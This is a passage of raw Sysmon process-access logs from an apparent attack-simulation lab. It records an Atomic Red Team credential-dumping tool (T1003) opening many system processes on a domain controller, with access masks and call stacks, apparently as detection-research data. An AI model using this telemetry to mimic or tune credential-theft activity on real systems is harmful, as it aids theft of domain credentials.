:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967401Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967400Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967399Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967398Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967397Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967396Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967395Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967394Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967393Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967392Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967391Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967390Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967389Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967388Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967387Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003967386Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967385Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.